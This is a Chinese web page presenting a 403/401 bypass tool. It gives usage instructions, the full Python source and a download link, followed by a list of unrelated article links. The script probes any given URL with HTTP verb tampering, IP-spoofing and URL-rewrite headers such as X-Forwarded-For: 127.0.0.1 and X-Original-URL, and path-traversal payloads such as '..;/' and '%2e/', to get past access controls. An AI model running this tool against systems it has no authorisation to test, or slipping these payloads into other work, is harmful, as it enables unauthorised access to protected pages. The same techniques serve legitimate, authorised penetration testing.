当前位置: 首页 > news >正文

一款自动化的403/401绕过测试工具

工具介绍

一款自动化的403/401绕过测试工具,集成了路径规范化、请求头注入及谓词篡改等多种实战技巧。

工具使用

python run.py -u http://xx.com

run.py

import requests import argparse import urllib3 from urllib.parse import urlparse # 忽略 SSL 警告 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) class BypassScanner: def __init__(self, target_url): self.target = target_url.rstrip('/') self.path = urlparse(target_url).path self.headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AF-Service-Scanner/1.0" } def scan(self): print(f"[*] Starting Bypass Scan for: {self.target}\n") # 1. 谓词篡改 (Verb Tampering) methods = ["GET", "POST", "HEAD", "PUT", "TRACE", "OPTIONS"] for m in methods: self._request(m, self.target, title=f"Method: {m}") # 2. Header 注入 bypass_headers = [ {"X-Forwarded-For": "127.0.0.1"}, {"X-Custom-IP-Authorization": "127.0.0.1"}, {"X-Original-URL": self.path}, {"X-Rewrite-URL": self.path}, {"X-Remote-IP": "127.0.0.1"}, {"X-Host": "127.0.0.1"} ] for h in bypass_headers: self._request("GET", self.target, headers=h, title=f"Header: {list(h.keys())[0]}") # 3. 路径变形 (Path Fuzzing) # 包含你提到的 ..;/ 和 ../ path_payloads = [ f"{self.target}/", f"{self.target}/.", f"{self.target}..;/", f"{self.target}/..;/", f"{self.target}/%2e/", f"{self.target}//", f"{self.target}.json" ] for p in path_payloads: self._request("GET", p, title=f"Path: {p.replace(self.target, '')}") def _request(self, method, url, headers=None, title=""): test_headers = self.headers.copy() if headers: test_headers.update(headers) try: resp = requests.request(method, url, headers=test_headers, verify=False, timeout=5, allow_redirects=False) color = "\033[92m" if resp.status_code == 200 else "\033[90m" print(f"{color}[{resp.status_code}] {title} \033[0m") except Exception as e: print(f"[!] Error on {title}: {e}") if __name__ == "__main__": parser = argparse.ArgumentParser(description="403/401 Bypass Automation Tool") parser.add_argument("-u", "--url", required=True, help="Target URL (e.g., https://example.com/admin)") args = parser.parse_args() scanner = BypassScanner(args.url) scanner.scan()

工具下载

https://github.com/Adonis-363/403-
http://www.jsqmd.com/news/263774/

相关文章:

  • 基于Comsol软件的激光熔覆熔池流动数值模拟:考虑马兰戈尼对流及元素影响下表面张力系数的转变研究
  • 英语_阅读_Baidus robotaxi_待读
  • XSS 漏洞练习靶场,覆盖反射型、存储型、DOM 型、SVG、CSP、框架注入、协议绕过等多种场景
  • 费雪的行业领导者理论:寻找市场冠军
  • IP反查工具,能够快速查询指定IP/域名关联的所有网站
  • 详细介绍:【杂谈】-边缘计算竞赛:人工智能硬件缘何超越云端
  • 学长亲荐10个AI论文写作软件,MBA论文轻松搞定!
  • java求职学习day49
  • ubuntu 实现远程登录
  • 挖掘 0-Day 漏洞:AFL++ 模糊测试实战,给开源图像库 (libpng) 找一个致命 Crash
  • 布隆过滤器进阶:布谷鸟过滤器 (Cuckoo Filter) 是如何支持“删除”操作的?
  • Codeforces Round 1073 Div1 + Div2 部分题目题解
  • web入门111-120
  • 第 485 场周赛Q1——3813. 元音辅音得分
  • 恶意代码分析:在沙箱中运行勒索病毒,用 IDA Pro 逆向它的加密逻辑
  • 导师严选2026 AI论文网站TOP8:继续教育写作全攻略
  • LLM 推理加速:深入 vLLM 源码,揭秘 PagedAttention 如何让吞吐量提升 20 倍?
  • 完整教程:【Go/Python/Java】基础语法+核心特性对比
  • 数据交易中的数据质量评估方法
  • 数据结构3.0 栈、队列和数组
  • 算子优化实战:手写 Triton Kernel,将 LayerNorm 算子的执行时间压缩 50%
  • 深度测评自考必备一键生成论文工具TOP8
  • Linux实操篇
  • 51单片机智能遮阳篷窗户帘衣架蓝牙APP光雨滴检测41(设计源文件+万字报告+讲解)(支持资料、图片参考_相关定制)_文章底部可以扫码
  • Java 并发探秘:JCTools 源码剖析,为什么 Netty 放弃 JDK 自带队列而选择 MpscArrayQueue?
  • todo
  • Go 调度器 (GMP) 揭秘:从汇编角度看 Goroutine 是如何实现“协程切换”的?
  • 【创新未发表】基于matlab鸡群算法CSO和自适应双种群协同鸡群算法ADPCCSO无人机避障三维航迹规划【含Matlab源码 14980期】
  • 第 174 场双周赛Q2——3810. 变成目标数组的最少操作次数
  • 【无人机三维路径规划】基于matlab鸡群算法CSO和自适应双种群协同鸡群算法ADPCCSO复杂山地模型下无人机路径规划【含Matlab源码 14981期】